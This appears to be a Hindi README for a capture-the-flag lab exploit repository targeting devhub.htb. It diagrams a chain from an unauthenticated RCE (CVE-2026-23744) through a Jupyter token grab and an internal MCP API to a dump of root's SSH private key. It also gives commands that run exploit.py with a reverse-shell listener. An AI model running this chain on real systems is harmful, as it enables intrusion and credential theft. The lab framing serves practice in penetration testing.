
CVE-2026-23744 RCE + Privilege Escalation
कठिनाई: मध्यम
OS: Linux
┌─────────────────────────────────────────────────────┐
│ CVE-2026-23744 │
│ अप्रमाणित POST → /api/mcp/connect │
└─────────────────────┬───────────────────────────────┘
↓
mcp-dev के रूप में शेल
↓
┌─────────────────────────────────────────────────────┐
│ portfwd 8888 → Jupyter Notebook टोकन ग्रैब │
└─────────────────────┬───────────────────────────────┘
↓
ब्राउज़र → http://127.0.0.1:8888
↓
नोटबुक सेल के माध्यम से analyst के रूप में शेल
↓
┌─────────────────────────────────────────────────────┐
│ cat /opt/opsmcp/server.py │
└─────────────────────┬───────────────────────────────┘
↓
portfwd 5000 → OPSMCP API
↓
↓
/root/.ssh/id_rsa डंप किया गया
↓
┌─────────────────────────────────────────────────────┐
│ ssh -i root_id_rsa [email protected] │
│ ROOT ★ │
└─────────────────────────────────────────────────────┘
| फ़ाइल | विवरण |
|---|---|
exploit.py | CVE-2026-23744 RCE शोषण जिसमें भेद्यता जांच है |
enum.py | स्थानीय गणना — Jupyter, MCP, Python, privesc |
# Exploit
python3 exploit.py -t devhub.htb -l <your_ip> -r 4444
# Enumeration (once on box)
python3 enum.py --section all
python3 enum.py --section jupyter
केवल शैक्षिक उद्देश्यों और अधिकृत परीक्षण के लिए।